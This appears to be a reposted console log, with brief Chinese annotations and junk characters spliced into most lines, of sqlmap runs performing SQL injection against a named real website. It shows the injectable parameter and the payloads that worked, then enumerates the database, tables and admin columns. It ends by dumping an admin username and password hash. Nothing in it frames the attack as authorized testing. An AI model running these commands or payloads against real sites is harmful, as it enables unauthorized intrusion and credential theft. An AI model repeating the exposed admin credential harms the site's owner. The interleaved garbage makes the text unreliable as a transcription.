D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
- N6 t: U* n3 |% V- B3 [9 ]ms "Mysql" --current-user /* 注解:获取当前用户名称+ L8 B$ b4 ?8 J. \, K) [3 c: x+ C
sqlmap/0.9 - automatic SQL injection and database takeover tool
) d- Z3 }* }* y, W! j; g# @! N http://sqlmap.sourceforge.net starting at: 16:53:541 Q; D2 h1 j8 W! g. f
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
2 A2 f( f u( _/ x4 y session file
4 w2 g/ b2 @3 o+ y9 J' \+ E8 i2 ~[16:53:54] [INFO] resuming injection data from session file
: O7 d9 h M" \[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
2 H/ D$ P0 g8 x! \[16:53:54] [INFO] testing connection to the target url5 `, A i% Y3 v; R2 q5 B& d
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
4 x; A4 b! f6 ?$ nsts:
9 @5 S( o+ \5 e8 L9 f) p---
" U# b! V) o, d4 v6 wPlace: GET
. R$ I# Z2 `, k- B. q, C, A' C" tParameter: id
! e( F1 _ A: T0 g0 Q7 R Type: boolean-based blind1 C4 I0 m& e/ f- A2 I0 ~+ |
Title: AND boolean-based blind - WHERE or HAVING clause
, r3 v; D% O) x, x. X+ h4 o, j$ w Payload: id=276 AND 799=799
7 a2 G/ T: n9 {- @8 Q) j Type: error-based
/ g- o( l* E+ w2 |8 y4 w Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
. U( I# g( `. x. c' d# c7 m- p% h Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
O* @4 _: B! y. w120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
# L; C# e% y# R),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
; ~, X- p0 Y+ e! w3 A! Q# Q- U Type: UNION query/ n w$ P3 Q4 Z) b7 E
Title: MySQL UNION query (NULL) - 1 to 10 columns
9 _) V5 ^1 p3 g! M# S, `( L Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR6 s) G( c5 [9 W/ Y
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),8 c( k! @% R* H4 H3 i$ [( e. c* \0 s
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
9 i2 o3 e+ B* n5 `! M" k Type: AND/OR time-based blind y$ ~1 ]2 l! E1 ]( k
Title: MySQL > 5.0.11 AND time-based blind
3 H) G& N( k$ h Payload: id=276 AND SLEEP(5)
( j2 T S6 v# o: y0 ]7 @4 [$ E---
7 @- @$ h1 q& o/ E% k8 j* Y& Q' W! K[16:53:55] [INFO] the back-end DBMS is MySQL# v( N+ O7 `0 k" z- r6 c) x
web server operating system: Windows; n7 F; Z' P2 q6 c7 \
web application technology: Apache 2.2.11, PHP 5.3.0
9 v4 n3 ]0 d* u" q f9 s: Qback-end DBMS: MySQL 5.07 @- c) r( \! g. W, g- d. J2 Z+ h
[16:53:55] [INFO] fetching current user, S `" T: W7 r* U) J
current user: 'root@localhost' # k7 r$ L/ q: x
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou* ? ?/ E) S: k; B
tput\www.wepost.com.hk' shutting down at: 16:53:58
! w" d- r; I4 |# `7 J3 T% V W
+ A6 B9 C! k0 y, T) q9 xD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
1 B/ @8 g, j. K& [3 z% l8 zms "Mysql" --current-db /*当前数据库
8 M) A4 q: |* n" K# ^- S sqlmap/0.9 - automatic SQL injection and database takeover tool
' w8 q& ^( F t+ q http://sqlmap.sourceforge.net starting at: 16:54:16
+ H* C+ I- p/ o( Z. Z( J( u% W[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
. H* ^; B4 a. J# G/ @ session file$ d! T: O& G3 ]5 ]8 y
[16:54:16] [INFO] resuming injection data from session file! m7 e B0 q& U" K
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file& P' @- i- R- Y) N4 m: m
[16:54:16] [INFO] testing connection to the target url4 H4 c" b6 J4 L L* P# Q! _
sqlmap identified the following injection points with a total of 0 HTTP(s) reque4 y/ q1 g3 x1 m6 y- D2 P- e
sts:3 _+ L, _( i& \ b
---0 y; W/ @7 c+ c; V8 X; t; v
Place: GET
5 a6 W( V4 f! m* O6 CParameter: id
9 H x- K g6 d1 P- _ Type: boolean-based blind3 E, y; V0 f1 D' ~/ Q5 K( E
Title: AND boolean-based blind - WHERE or HAVING clause
9 m9 f9 z2 J0 x7 m- j' s+ b Payload: id=276 AND 799=7990 h% d7 h$ s7 } e. X* t8 o/ V
Type: error-based+ K+ V M0 L$ K
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause; M' F1 M! ~, n# C
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
! _( B9 k* s5 O$ m* {1 \120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
* ?9 G$ f5 N" `2 H2 T1 y),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
5 p O3 ~3 U+ ^6 V3 t7 ^. e* A Type: UNION query
; ]% l; J" @/ H _6 a: P. z( w) e4 f" t Title: MySQL UNION query (NULL) - 1 to 10 columns3 q- X' i' Q$ K; A
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR; b# s" ^( m- \7 B8 s' I( \; @
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),! U2 b& @0 G1 Q7 o% b. V
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
9 Z0 m% y% a( m5 S Type: AND/OR time-based blind0 v; |% K0 t. q, j: F2 t/ V) i& p
Title: MySQL > 5.0.11 AND time-based blind
7 @* M' L5 U, n" b& }) J Payload: id=276 AND SLEEP(5)
3 b1 y0 @% \ @# v4 S+ _. S---# l) P) z! o$ K% M; W8 p
[16:54:17] [INFO] the back-end DBMS is MySQL: F4 w$ C4 J0 {. }- ^
web server operating system: Windows
4 ]! ]; V0 \$ q; ]3 U: Eweb application technology: Apache 2.2.11, PHP 5.3.06 f) [- \ X3 H) c
back-end DBMS: MySQL 5.0* z3 J3 D% ]) x9 y" W- s5 c' d, F5 X
[16:54:17] [INFO] fetching current database
& s# D, J* D# u" o3 D: Y( Acurrent database: 'wepost': S: }& f( X& B5 Z( e' Q& v4 ]
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou! O9 A* O( R7 N0 z1 u
tput\www.wepost.com.hk' shutting down at: 16:54:18
- w! ~/ U B" j0 X% {% lD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db2 ?: G: F3 u% J" t" J7 E
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名! j8 S2 W( J6 v+ V# M- L8 {
sqlmap/0.9 - automatic SQL injection and database takeover tool) ]. ^1 A j: {8 m, ]' t7 k% h2 z d4 v
http://sqlmap.sourceforge.net starting at: 16:55:252 C1 z, `. f$ g* P' r& @6 ~
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as' I8 b# ?* q9 T* X# j2 S$ a9 ?
session file
, N+ p& K8 a" ^$ f$ o[16:55:25] [INFO] resuming injection data from session file
! [: E8 D5 A7 o[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file: ~9 L- O6 f' |3 v- ~" O" `" }
[16:55:25] [INFO] testing connection to the target url
, B8 `. g: c; ?: k9 z9 k$ nsqlmap identified the following injection points with a total of 0 HTTP(s) reque
) N2 }# h: B* ?/ S# wsts:
* L: e5 F5 k7 w8 t' [! n---5 X- a/ j$ v1 Y6 M) d
Place: GET
5 G3 c+ k) A s- I4 o* pParameter: id
9 B# k; H+ T3 e9 ]/ g @2 K- D Type: boolean-based blind
0 \. E6 D5 b, c+ [* l" R' j/ Q: I$ H3 i Title: AND boolean-based blind - WHERE or HAVING clause/ P O6 |1 Z1 h5 k
Payload: id=276 AND 799=799
) A `% [9 B' {" M Type: error-based
1 d: H7 u4 @8 u. T Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause# j X! f( r5 m& ?7 Q
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,0 t) I/ @* `* `$ O
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58" I5 H# v, f4 M( K" j4 U
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)' _, b7 T. l& X" W; w4 v' d _3 Y0 D
Type: UNION query
9 i0 |2 |$ t; S+ V9 S: t, \ Title: MySQL UNION query (NULL) - 1 to 10 columns
, } c' s2 Y9 E3 a, `. ~ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR+ N9 s0 U# n4 v6 _* P9 @
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
$ v6 q: g5 F/ i% j* o1 r$ q' G' n% v3 e4 pCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#5 X9 P0 r( _7 Z5 F
Type: AND/OR time-based blind
4 h6 w! \7 ~9 n" X0 \ Title: MySQL > 5.0.11 AND time-based blind: O. l+ D; Q& Y4 k+ a& v
Payload: id=276 AND SLEEP(5)8 J5 H2 |. C! |" G0 T) i7 j/ E
---" ]: ^1 M" q+ `# d+ {
[16:55:26] [INFO] the back-end DBMS is MySQL7 ~4 s% I$ l& O- i
web server operating system: Windows
, r% j, F: F$ H9 i) A, Tweb application technology: Apache 2.2.11, PHP 5.3.0
" B$ G. ~6 L$ l8 P2 Z1 Mback-end DBMS: MySQL 5.0
; w; [, H5 R1 P[16:55:26] [INFO] fetching tables for database 'wepost'; c {, [* [5 |& I- `+ o
[16:55:27] [INFO] the SQL query used returns 6 entries5 T0 Q6 @* F6 F( f3 x8 b5 q
Database: wepost
' l! E$ e1 T: a3 r. E[6 tables]" {% ?; K4 v4 |. V1 C8 h& \/ ?
+-------------+# _9 D, V/ x3 ^5 h
| admin |
7 v8 i- u+ p. V0 d$ N| article |
( x. z9 M# W: M4 Q, { U& m5 _+ d| contributor |
) O, m8 w5 \0 Q& ^6 @| idea |
- u2 i8 K5 M0 w| image |% F3 K- ^) r% H
| issue |% M! B9 b9 v) ?9 U$ N# s
+-------------+5 u' u) w9 q$ l5 Z; y( u2 o
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
) F S" b! w* ^* D9 a5 ?tput\www.wepost.com.hk' shutting down at: 16:55:33
5 I _4 S4 S" ~3 e" {0 Y _9 u* g" n. v; I q
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
) O: n7 F3 ]0 W" v# lms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
6 o/ v/ w+ ]* r8 X9 ]5 r sqlmap/0.9 - automatic SQL injection and database takeover tool
9 r* }/ b( N7 b$ h- e" Q& D. q http://sqlmap.sourceforge.net starting at: 16:56:06/ D- g3 J H4 d. b
sqlmap identified the following injection points with a total of 0 HTTP(s) reque3 x8 U& ^* U! K( C7 U2 x4 L
sts:9 P' o r1 v2 w1 |, P
---
, G- a2 }6 [7 o; }# ]$ z$ IPlace: GET
- F' W2 b! s7 V& S: f5 dParameter: id
3 h; J! l' Q3 r* `) j Type: boolean-based blind* Y* b7 `. }1 d, N$ b" E1 A4 t& u6 G
Title: AND boolean-based blind - WHERE or HAVING clause
- w: m' i. C. @2 V. F Payload: id=276 AND 799=799
+ z" `: \& P9 s2 m2 L% M, z D: t Type: error-based
9 h+ Y6 S. B- I" l+ I Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
) j8 z% f O$ ~" \+ h X+ x Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
4 a* v$ @. w [: D" V8 i: @7 f$ h120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
' X; x0 b3 D8 ^2 K! [1 [2 E$ u),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" L8 n* A Q) `5 j5 X0 T
Type: UNION query
, H* ]* y* E, m: k) L Title: MySQL UNION query (NULL) - 1 to 10 columns
6 N5 J7 v. ~. i) b& W' B. x Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR |$ n" D9 p C/ e! E
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),/ h- Q0 E& Y1 k$ g# P" l( p6 r
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
i4 d; q* ^4 \3 m1 E8 l9 \ Type: AND/OR time-based blind
2 e4 J$ C. ^+ t6 S% s Title: MySQL > 5.0.11 AND time-based blind6 n! x9 s. m5 x1 Q
Payload: id=276 AND SLEEP(5)
# D# z) I6 r) r---( I* X6 M) C% G+ _6 G, u
web server operating system: Windows
6 B" o4 K' g( X/ r! r' N$ A; N3 L/ Oweb application technology: Apache 2.2.11, PHP 5.3.0# j5 x2 ?: @4 V: V
back-end DBMS: MySQL 5.0
0 }4 `& \6 j' Y4 j! X[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se( ~4 [1 y/ j# Y5 u2 T( G4 ]& Q8 x
ssion': wepost, wepost: G1 `, F7 @+ t3 J
Database: wepost" @7 c+ f; ~7 ]% d8 g
Table: admin7 H6 M7 T+ h3 x5 r3 r. _: v
[4 columns]) v. k- l% l, v
+----------+-------------+
* S7 p9 a U# }+ j| Column | Type |
4 J9 l% K9 f/ B& ]2 w+----------+-------------+! w% i5 e: t3 o' H/ y: j( r/ Y2 _6 D
| id | int(11) |" R( B" o) T& y" Y5 I! A
| password | varchar(32) |3 d, d% _# }5 p3 P
| type | varchar(10) |
, E$ q( Q) _7 }5 Z8 ?( w| userid | varchar(20) |8 s G/ p9 F& q( T
+----------+-------------+) P% G# v! z* p7 [0 q0 I
shutting down at: 16:56:19
- x5 z5 {/ Z5 w, i6 i( f& v/ y5 y& _4 l% F* W) N, A
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db4 z, m9 H+ e2 a+ N
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容$ L) z1 `* a' O( \( w/ w* x
sqlmap/0.9 - automatic SQL injection and database takeover tool3 X/ u* D3 i: k# r: ]* a
http://sqlmap.sourceforge.net starting at: 16:57:146 h* `! J5 e% Z- c M
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
! w5 u; D/ _5 K, t8 ^/ Ists:
) `8 D% I' ]) a* Z( _+ A---
d9 Z6 ?4 P9 B% D5 B2 _' }Place: GET* n1 W0 b! T( q1 {
Parameter: id
1 e( j I/ W0 G6 b) p, V1 P- A Type: boolean-based blind
8 V# E- R9 Z% N; u Title: AND boolean-based blind - WHERE or HAVING clause' w7 ~1 U* y$ m# p3 J
Payload: id=276 AND 799=799
* b/ o$ E( D5 t+ l Type: error-based+ ?- H1 k0 G- b3 G. D: g; V
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
, O. n" Q, |; f) M2 u1 g: J Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
8 K2 A% \+ k2 [1 P7 A' U120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,587 T( O# x+ b+ N3 ]' R! E
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)0 ~( j# c$ S4 `7 W
Type: UNION query2 X5 }$ E t- v* x. {
Title: MySQL UNION query (NULL) - 1 to 10 columns
, F; ^! m" _1 D3 J. t Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR+ F! K+ e1 _- [5 e* E7 s
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
+ l: j# x+ Q ?6 @8 nCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#+ ]3 g0 J5 g$ ]; C4 c7 I
Type: AND/OR time-based blind
( d3 v8 O+ M: b, N% L9 |) A Title: MySQL > 5.0.11 AND time-based blind
; \0 K7 b& k/ u Payload: id=276 AND SLEEP(5)7 b( L, I! W4 t _
---
m2 p0 } v, c$ pweb server operating system: Windows7 G; h$ s' T+ J( Q- `: z: m
web application technology: Apache 2.2.11, PHP 5.3.08 _ w8 v. o& g8 @' g5 J7 B7 t% h
back-end DBMS: MySQL 5.0) L* q6 B& |1 g5 h* Q! H2 M! q5 X
recognized possible password hash values. do you want to use dictionary attack o- N: j/ t1 s/ j1 @% W- f
n retrieved table items? [Y/n/q] y
2 \: i& X2 g! c [7 A+ P- iwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]1 d' s p% l, ]/ o' a" x# }$ _
do you want to use common password suffixes? (slow!) [y/N] y- s$ f1 y3 b' R) ^
Database: wepost) d7 W8 i$ j( U7 Z* i- o$ ]% I( V
Table: admin- F9 ?, t8 c$ u" y. Z9 Q+ K
[1 entry]
) K6 m* N8 Z% S) ]+----------------------------------+------------+$ q. \7 N( K8 i) w% L! s
| password | userid |% m) G6 Z5 N" w9 k6 F
+----------------------------------+------------+' @" r* ~$ S( T; W
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |7 H+ t$ F* t. u
+----------------------------------+------------+1 o1 i, Z4 J W
shutting down at: 16:58:14
( f& Z% E) Q8 n: G, m7 A6 b
6 ~% }, m* @$ XD:\Python27\sqlmap> |